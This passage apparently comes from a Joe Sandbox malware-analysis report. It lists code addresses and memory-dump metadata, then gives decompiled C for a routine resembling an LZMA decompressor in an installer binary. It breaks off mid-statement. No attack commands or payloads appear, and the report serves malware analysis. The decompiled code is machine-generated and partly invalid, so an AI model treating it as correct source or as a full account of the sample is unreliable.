                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004073ce
                                                                                                                                                                                                                            0x004073ce
                                                                                                                                                                                                                            0x004073d4
                                                                                                                                                                                                                            0x004073da
                                                                                                                                                                                                                            0x004073e0
                                                                                                                                                                                                                            0x004073fa
                                                                                                                                                                                                                            0x004073fd
                                                                                                                                                                                                                            0x00407403
                                                                                                                                                                                                                            0x0040740e
                                                                                                                                                                                                                            0x00407410
                                                                                                                                                                                                                            0x004073e2
                                                                                                                                                                                                                            0x004073e2
                                                                                                                                                                                                                            0x004073f1
                                                                                                                                                                                                                            0x004073f5
                                                                                                                                                                                                                            0x004073f5
                                                                                                                                                                                                                            0x0040741a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406d5f
                                                                                                                                                                                                                            0x00406d61
                                                                                                                                                                                                                            0x00406d64
                                                                                                                                                                                                                            0x00406dd5
                                                                                                                                                                                                                            0x00406dd8
                                                                                                                                                                                                                            0x00406ddb
                                                                                                                                                                                                                            0x00406de2
                                                                                                                                                                                                                            0x00406dec
                                                                                                                                                                                                                            0x004073cb
                                                                                                                                                                                                                            0x004073cb
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004073cb
                                                                                                                                                                                                                            0x00406d66
                                                                                                                                                                                                                            0x00406d6a
                                                                                                                                                                                                                            0x00406d6d
                                                                                                                                                                                                                            0x00406d6f
                                                                                                                                                                                                                            0x00406d72
                                                                                                                                                                                                                            0x00406d75
                                                                                                                                                                                                                            0x00406d77
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406e35
                                                                                                                                                                                                                            0x00406e35
                                                                                                                                                                                                                            0x00406e39
                                                                                                                                                                                                                            0x00406e3c
                                                                                                                                                                                                                            0x00406e3f
                                                                                                                                                                                                                            0x00406e42
                                                                                                                                                                                                                            0x00406e45
                                                                                                                                                                                                                            0x00406e46
                                                                                                                                                                                                                            0x00406e49
                                                                                                                                                                                                                            0x00406e4b
                                                                                                                                                                                                                            0x00406e51
                                                                                                                                                                                                                            0x00406e54
                                                                                                                                                                                                                            0x00406e57
                                                                                                                                                                                                                            0x00406e5a
                                                                                                                                                                                                                            0x00406e5d
                                                                                                                                                                                                                            0x00406e60
                                                                                                                                                                                                                            0x00406e63
                                                                                                                                                                                                                            0x00406e7f
                                                                                                                                                                                                                            0x00406e82
                                                                                                                                                                                                                            0x00406e85
                                                                                                                                                                                                                            0x00406e88
                                                                                                                                                                                                                            0x00406e8f
                                                                                                                                                                                                                            0x00406e93
                                                                                                                                                                                                                            0x00406e95
                                                                                                                                                                                                                            0x00406e99
                                                                                                                                                                                                                            0x00406e65
                                                                                                                                                                                                                            0x00406e65
                                                                                                                                                                                                                            0x00406e69
                                                                                                                                                                                                                            0x00406e71
                                                                                                                                                                                                                            0x00406e76
                                                                                                                                                                                                                            0x00406e78
                                                                                                                                                                                                                            0x00406e7a
                                                                                                                                                                                                                            0x00406e7a
                                                                                                                                                                                                                            0x00406e9c
                                                                                                                                                                                                                            0x00406ea3
                                                                                                                                                                                                                            0x00406ea6
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406eac
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406eac
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406eb1
                                                                                                                                                                                                                            0x00406eb1
                                                                                                                                                                                                                            0x00406eb5
                                                                                                                                                                                                                            0x00407575
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407575
                                                                                                                                                                                                                            0x00406ebb
                                                                                                                                                                                                                            0x00406ebe
                                                                                                                                                                                                                            0x00406ec1
                                                                                                                                                                                                                            0x00406ec5
                                                                                                                                                                                                                            0x00406ec8
                                                                                                                                                                                                                            0x00406ece
                                                                                                                                                                                                                            0x00406ed0
                                                                                                                                                                                                                            0x00406ed0
                                                                                                                                                                                                                            0x00406ed0
                                                                                                                                                                                                                            0x00406ed3
                                                                                                                                                                                                                            0x00406ed6
                                                                                                                                                                                                                            0x00406ed6
                                                                                                                                                                                                                            0x00406ed6
                                                                                                                                                                                                                            0x00406edc
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406ede
                                                                                                                                                                                                                            0x00406ee1
                                                                                                                                                                                                                            0x00406ee4
                                                                                                                                                                                                                            0x00406ee7
                                                                                                                                                                                                                            0x00406eea
                                                                                                                                                                                                                            0x00406eed
                                                                                                                                                                                                                            0x00406ef0
                                                                                                                                                                                                                            0x00406ef3
                                                                                                                                                                                                                            0x00406ef6
                                                                                                                                                                                                                            0x00406ef9
                                                                                                                                                                                                                            0x00406efc
                                                                                                                                                                                                                            0x00406f14
                                                                                                                                                                                                                            0x00406f17
                                                                                                                                                                                                                            0x00406f1a
                                                                                                                                                                                                                            0x00406f1d
                                                                                                                                                                                                                            0x00406f1d
                                                                                                                                                                                                                            0x00406f20
                                                                                                                                                                                                                            0x00406f24
                                                                                                                                                                                                                            0x00406f26
                                                                                                                                                                                                                            0x00406efe
                                                                                                                                                                                                                            0x00406efe
                                                                                                                                                                                                                            0x00406f06
                                                                                                                                                                                                                            0x00406f0b
                                                                                                                                                                                                                            0x00406f0d
                                                                                                                                                                                                                            0x00406f0f
                                                                                                                                                                                                                            0x00406f0f
                                                                                                                                                                                                                            0x00406f29
                                                                                                                                                                                                                            0x00406f30
                                                                                                                                                                                                                            0x00406f33
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406f35
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406f35
                                                                                                                                                                                                                            0x00406f33
                                                                                                                                                                                                                            0x00406f3a
                                                                                                                                                                                                                            0x00406f3a
                                                                                                                                                                                                                            0x00406f3a
                                                                                                                                                                                                                            0x00406f3a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406f75
                                                                                                                                                                                                                            0x00406f75
                                                                                                                                                                                                                            0x00406f79
                                                                                                                                                                                                                            0x00407581
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407581
                                                                                                                                                                                                                            0x00406f7f
                                                                                                                                                                                                                            0x00406f82
                                                                                                                                                                                                                            0x00406f85
                                                                                                                                                                                                                            0x00406f89
                                                                                                                                                                                                                            0x00406f8c
                                                                                                                                                                                                                            0x00406f92
                                                                                                                                                                                                                            0x00406f94
                                                                                                                                                                                                                            0x00406f94
                                                                                                                                                                                                                            0x00406f94
                                                                                                                                                                                                                            0x00406f97
                                                                                                                                                                                                                            0x004074c1
                                                                                                                                                                                                                            0x004074c4
                                                                                                                                                                                                                            0x004074c4
                                                                                                                                                                                                                            0x004074c4
                                                                                                                                                                                                                            0x004074c4
                                                                                                                                                                                                                            0x004074c7
                                                                                                                                                                                                                            0x004074c7
                                                                                                                                                                                                                            0x004074cb
                                                                                                                                                                                                                            0x0040752b
                                                                                                                                                                                                                            0x0040752e
                                                                                                                                                                                                                            0x00407533
                                                                                                                                                                                                                            0x00407534
                                                                                                                                                                                                                            0x00407536
                                                                                                                                                                                                                            0x00407538
                                                                                                                                                                                                                            0x0040753b
                                                                                                                                                                                                                            0x00407447
                                                                                                                                                                                                                            0x00407447
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040744d
                                                                                                                                                                                                                            0x00407447
                                                                                                                                                                                                                            0x004074cd
                                                                                                                                                                                                                            0x004074d3
                                                                                                                                                                                                                            0x004074d6
                                                                                                                                                                                                                            0x004074d9
                                                                                                                                                                                                                            0x004074dc
                                                                                                                                                                                                                            0x004074df
                                                                                                                                                                                                                            0x004074e2
                                                                                                                                                                                                                            0x004074e5
                                                                                                                                                                                                                            0x004074e8
                                                                                                                                                                                                                            0x004074eb
                                                                                                                                                                                                                            0x004074ee
                                                                                                                                                                                                                            0x00407507
                                                                                                                                                                                                                            0x0040750a
                                                                                                                                                                                                                            0x0040750d
                                                                                                                                                                                                                            0x00407510
                                                                                                                                                                                                                            0x00407514
                                                                                                                                                                                                                            0x00407516
                                                                                                                                                                                                                            0x00407516
                                                                                                                                                                                                                            0x00407517
                                                                                                                                                                                                                            0x0040751a
                                                                                                                                                                                                                            0x004074f0
                                                                                                                                                                                                                            0x004074f0
                                                                                                                                                                                                                            0x004074f8
                                                                                                                                                                                                                            0x004074fd
                                                                                                                                                                                                                            0x004074ff
                                                                                                                                                                                                                            0x00407502
                                                                                                                                                                                                                            0x00407502
                                                                                                                                                                                                                            0x0040751d
                                                                                                                                                                                                                            0x00407524
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407526
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407526
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004071c2
                                                                                                                                                                                                                            0x004071c5
                                                                                                                                                                                                                            0x004071fb
                                                                                                                                                                                                                            0x0040732b
                                                                                                                                                                                                                            0x0040732b
                                                                                                                                                                                                                            0x0040732b
                                                                                                                                                                                                                            0x0040732b
                                                                                                                                                                                                                            0x0040732e
                                                                                                                                                                                                                            0x0040732e
                                                                                                                                                                                                                            0x00407331
                                                                                                                                                                                                                            0x00407333
                                                                                                                                                                                                                            0x004075bd
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004075bd
                                                                                                                                                                                                                            0x00407339
                                                                                                                                                                                                                            0x0040733c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407342
                                                                                                                                                                                                                            0x00407346
                                                                                                                                                                                                                            0x00407349
                                                                                                                                                                                                                            0x00407349
                                                                                                                                                                                                                            0x00407349
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407349
                                                                                                                                                                                                                            0x004071c7
                                                                                                                                                                                                                            0x004071c9
                                                                                                                                                                                                                            0x004071cb
                                                                                                                                                                                                                            0x004071cd
                                                                                                                                                                                                                            0x004071d0
                                                                                                                                                                                                                            0x004071d1
                                                                                                                                                                                                                            0x004071d3
                                                                                                                                                                                                                            0x004071d5
                                                                                                                                                                                                                            0x004071d8
                                                                                                                                                                                                                            0x004071db
                                                                                                                                                                                                                            0x004071f1
                                                                                                                                                                                                                            0x004071f6
                                                                                                                                                                                                                            0x0040722e
                                                                                                                                                                                                                            0x0040722e
                                                                                                                                                                                                                            0x00407232
                                                                                                                                                                                                                            0x0040725e
                                                                                                                                                                                                                            0x00407260
                                                                                                                                                                                                                            0x00407267
                                                                                                                                                                                                                            0x0040726a
                                                                                                                                                                                                                            0x0040726d
                                                                                                                                                                                                                            0x0040726d
                                                                                                                                                                                                                            0x00407272
                                                                                                                                                                                                                            0x00407272
                                                                                                                                                                                                                            0x00407274
                                                                                                                                                                                                                            0x00407277
                                                                                                                                                                                                                            0x0040727e
                                                                                                                                                                                                                            0x00407281
                                                                                                                                                                                                                            0x004072ae
                                                                                                                                                                                                                            0x004072ae
                                                                                                                                                                                                                            0x004072b1
                                                                                                                                                                                                                            0x004072b4
                                                                                                                                                                                                                            0x00407328
                                                                                                                                                                                                                            0x00407328
                                                                                                                                                                                                                            0x00407328
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407328
                                                                                                                                                                                                                            0x004072b6
                                                                                                                                                                                                                            0x004072bc
                                                                                                                                                                                                                            0x004072bf
                                                                                                                                                                                                                            0x004072c2
                                                                                                                                                                                                                            0x004072c5
                                                                                                                                                                                                                            0x004072c8
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407390
                                                                                                                                                                                                                            0x0040710d
                                                                                                                                                                                                                            0x0040710d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040710d
                                                                                                                                                                                                                            0x0040738e
                                                                                                                                                                                                                            0x004075c3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406bf2
                                                                                                                                                                                                                            0x004075fa
                                                                                                                                                                                                                            0x004075fa
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004075fa
                                                                                                                                                                                                                            0x00407447
                                                                                                                                                                                                                            0x004073ce
                                                                                                                                                                                                                            0x004073cb
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407002

                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                                                                                                                                                                                            • Instruction ID: 4a3513360c1d1cc4287bdabe5afcaa460628bed3c0d7ae87261646ca99be8a9f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0D711271D04228DBEF28CF98C9947ADBBF1FB44305F14806AD856B7280D738A986DF05
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 98%
                                                                                                                                                                                                                            			E0040711C() {
                                                                                                                                                                                                                            				unsigned short _t531;
                                                                                                                                                                                                                            				signed int _t532;
                                                                                                                                                                                                                            				void _t533;
                                                                                                                                                                                                                            				signed int _t534;
                                                                                                                                                                                                                            				signed int _t535;
                                                                                                                                                                                                                            				signed int _t565;
                                                                                                                                                                                                                            				signed int _t568;
                                                                                                                                                                                                                            				signed int _t589;
                                                                                                                                                                                                                            				signed int* _t606;
                                                                                                                                                                                                                            				void* _t613;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				L0:
                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                            					L0:
                                                                                                                                                                                                                            					if( *(_t613 - 0x40) != 0) {
                                                                                                                                                                                                                            						 *(_t613 - 0x84) = 0xb;
                                                                                                                                                                                                                            						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
                                                                                                                                                                                                                            						goto L132;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						__eax =  *(__ebp - 0x28);
                                                                                                                                                                                                                            						L88:
                                                                                                                                                                                                                            						 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                                                            						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                                                                                            						L89:
                                                                                                                                                                                                                            						__eax =  *(__ebp - 4);
                                                                                                                                                                                                                            						 *(__ebp - 0x80) = 0x15;
                                                                                                                                                                                                                            						__eax =  *(__ebp - 4) + 0xa68;
                                                                                                                                                                                                                            						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                                                                                                                                                            						L69:
                                                                                                                                                                                                                            						 *(__ebp - 0x84) = 0x12;
                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                            							L132:
                                                                                                                                                                                                                            							 *(_t613 - 0x54) = _t606;
                                                                                                                                                                                                                            							while(1) {
                                                                                                                                                                                                                            								L133:
                                                                                                                                                                                                                            								_t531 =  *_t606;
                                                                                                                                                                                                                            								_t589 = _t531 & 0x0000ffff;
                                                                                                                                                                                                                            								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                                                                                                                                                            								if( *(_t613 - 0xc) >= _t565) {
                                                                                                                                                                                                                            									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                                                                                                                                                            									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                                                                                                                                                            									 *(_t613 - 0x40) = 1;
                                                                                                                                                                                                                            									_t532 = _t531 - (_t531 >> 5);
                                                                                                                                                                                                                            									 *_t606 = _t532;
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									 *(_t613 - 0x10) = _t565;
                                                                                                                                                                                                                            									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                                                                                                                            									 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                                                                                                                                                            									goto L139;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								L137:
                                                                                                                                                                                                                            								if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                                                                                            									 *(_t613 - 0x88) = 5;
                                                                                                                                                                                                                            									L170:
                                                                                                                                                                                                                            									_t568 = 0x22;
                                                                                                                                                                                                                            									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                                                                                                                                                                                            									_t535 = 0;
                                                                                                                                                                                                                            									L172:
                                                                                                                                                                                                                            									return _t535;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                                                                                                                                                                                            								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                                                                                            								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                                                                                            								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            								L139:
                                                                                                                                                                                                                            								_t533 =  *(_t613 - 0x84);
                                                                                                                                                                                                                            								while(1) {
                                                                                                                                                                                                                            									 *(_t613 - 0x88) = _t533;
                                                                                                                                                                                                                            									while(1) {
                                                                                                                                                                                                                            										L1:
                                                                                                                                                                                                                            										_t534 =  *(_t613 - 0x88);
                                                                                                                                                                                                                            										if(_t534 > 0x1c) {
                                                                                                                                                                                                                            											break;
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            										switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                                                                                                                                                                                                                            											case 0:
                                                                                                                                                                                                                            												if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                                                                                            													goto L170;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                                                                                            												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                                                                                            												_t534 =  *( *(_t613 - 0x70));
                                                                                                                                                                                                                            												if(_t534 > 0xe1) {
                                                                                                                                                                                                                            													goto L171;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												_t538 = _t534 & 0x000000ff;
                                                                                                                                                                                                                            												_push(0x2d);
                                                                                                                                                                                                                            												asm("cdq");
                                                                                                                                                                                                                            												_pop(_t570);
                                                                                                                                                                                                                            												_push(9);
                                                                                                                                                                                                                            												_pop(_t571);
                                                                                                                                                                                                                            												_t609 = _t538 / _t570;
                                                                                                                                                                                                                            												_t540 = _t538 % _t570 & 0x000000ff;
                                                                                                                                                                                                                            												asm("cdq");
                                                                                                                                                                                                                            												_t604 = _t540 % _t571 & 0x000000ff;
                                                                                                                                                                                                                            												 *(_t613 - 0x3c) = _t604;
                                                                                                                                                                                                                            												 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                                                                                                                                                                                            												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                                                                                                                                                                                            												_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                                                                                                                                                                                            												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                                                                                                                                                                                            													L10:
                                                                                                                                                                                                                            													if(_t612 == 0) {
                                                                                                                                                                                                                            														L12:
                                                                                                                                                                                                                            														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                                                                                                                                                                                            														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                                                                                                                            														goto L15;
                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                            														goto L11;
                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                            													do {
                                                                                                                                                                                                                            														L11:
                                                                                                                                                                                                                            														_t612 = _t612 - 1;
                                                                                                                                                                                                                            														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                                                                                                                                                                                            													} while (_t612 != 0);
                                                                                                                                                                                                                            													goto L12;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												if( *(_t613 - 4) != 0) {
                                                                                                                                                                                                                            													GlobalFree( *(_t613 - 4));
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                                                                                                                            												 *(_t613 - 4) = _t534;
                                                                                                                                                                                                                            												if(_t534 == 0) {
                                                                                                                                                                                                                            													goto L171;
                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                            													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                                                                                                                                                                                            													goto L10;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            											case 1:
                                                                                                                                                                                                                            												L13:
                                                                                                                                                                                                                            												__eflags =  *(_t613 - 0x6c);
                                                                                                                                                                                                                            												if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                                                                                            													 *(_t613 - 0x88) = 1;
                                                                                                                                                                                                                            													goto L170;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                                                                                            												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                                                                                                                                                                                            												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                                                                                            												_t45 = _t613 - 0x48;
                                                                                                                                                                                                                            												 *_t45 =  *(_t613 - 0x48) + 1;
                                                                                                                                                                                                                            												__eflags =  *_t45;
                                                                                                                                                                                                                            												L15:
                                                                                                                                                                                                                            												if( *(_t613 - 0x48) < 4) {
                                                                                                                                                                                                                            													goto L13;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												_t546 =  *(_t613 - 0x40);
                                                                                                                                                                                                                            												if(_t546 ==  *(_t613 - 0x74)) {
                                                                                                                                                                                                                            													L20:
                                                                                                                                                                                                                            													 *(_t613 - 0x48) = 5;
                                                                                                                                                                                                                            													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                                                                                                                                                                                            													goto L23;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												 *(_t613 - 0x74) = _t546;
                                                                                                                                                                                                                            												if( *(_t613 - 8) != 0) {
                                                                                                                                                                                                                            													GlobalFree( *(_t613 - 8));
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                                                                                                                                                                                            												 *(_t613 - 8) = _t534;
                                                                                                                                                                                                                            												if(_t534 == 0) {
                                                                                                                                                                                                                            													goto L171;
                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                            													goto L20;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            											case 2:
                                                                                                                                                                                                                            												L24:
                                                                                                                                                                                                                            												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                                                                                                                                                                                            												 *(_t613 - 0x84) = 6;
                                                                                                                                                                                                                            												 *(_t613 - 0x4c) = _t553;
                                                                                                                                                                                                                            												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                                                                                                                                                                                            												L132:
                                                                                                                                                                                                                            												 *(_t613 - 0x54) = _t606;
                                                                                                                                                                                                                            												goto L133;
                                                                                                                                                                                                                            											case 3:
                                                                                                                                                                                                                            												L21:
                                                                                                                                                                                                                            												__eflags =  *(_t613 - 0x6c);
                                                                                                                                                                                                                            												if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                                                                                            													 *(_t613 - 0x88) = 3;
                                                                                                                                                                                                                            													goto L170;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                                                                                            												_t67 = _t613 - 0x70;
                                                                                                                                                                                                                            												 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                                                                                            												__eflags =  *_t67;
                                                                                                                                                                                                                            												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            												L23:
                                                                                                                                                                                                                            												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                                                                                                                                                                                            												if( *(_t613 - 0x48) != 0) {
                                                                                                                                                                                                                            													goto L21;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												goto L24;
                                                                                                                                                                                                                            											case 4:
                                                                                                                                                                                                                            												L133:
                                                                                                                                                                                                                            												_t531 =  *_t606;
                                                                                                                                                                                                                            												_t589 = _t531 & 0x0000ffff;
                                                                                                                                                                                                                            												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                                                                                                                                                            												if( *(_t613 - 0xc) >= _t565) {
                                                                                                                                                                                                                            													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                                                                                                                                                            													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                                                                                                                                                            													 *(_t613 - 0x40) = 1;
                                                                                                                                                                                                                            													_t532 = _t531 - (_t531 >> 5);
                                                                                                                                                                                                                            													 *_t606 = _t532;
                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                            													 *(_t613 - 0x10) = _t565;
                                                                                                                                                                                                                            													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                                                                                                                            													 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                                                                                                                                                            													goto L139;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            											case 5:
                                                                                                                                                                                                                            												goto L137;
                                                                                                                                                                                                                            											case 6:
                                                                                                                                                                                                                            												__edx = 0;
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                                            												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                                            													__eax =  *(__ebp - 4);
                                                                                                                                                                                                                            													__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                                                            													 *(__ebp - 0x34) = 1;
                                                                                                                                                                                                                            													 *(__ebp - 0x84) = 7;
                                                                                                                                                                                                                            													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                                                            													while(1) {
                                                                                                                                                                                                                            														L132:
                                                                                                                                                                                                                            														 *(_t613 - 0x54) = _t606;
                                                                                                                                                                                                                            														goto L133;
                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                                                                                                                            												__esi =  *(__ebp - 0x60);
                                                                                                                                                                                                                            												__cl = 8;
                                                                                                                                                                                                                            												__cl = 8 -  *(__ebp - 0x3c);
                                                                                                                                                                                                                            												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                                                                                                                            												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 0x3c);
                                                                                                                                                                                                                            												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 4);
                                                                                                                                                                                                                            												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
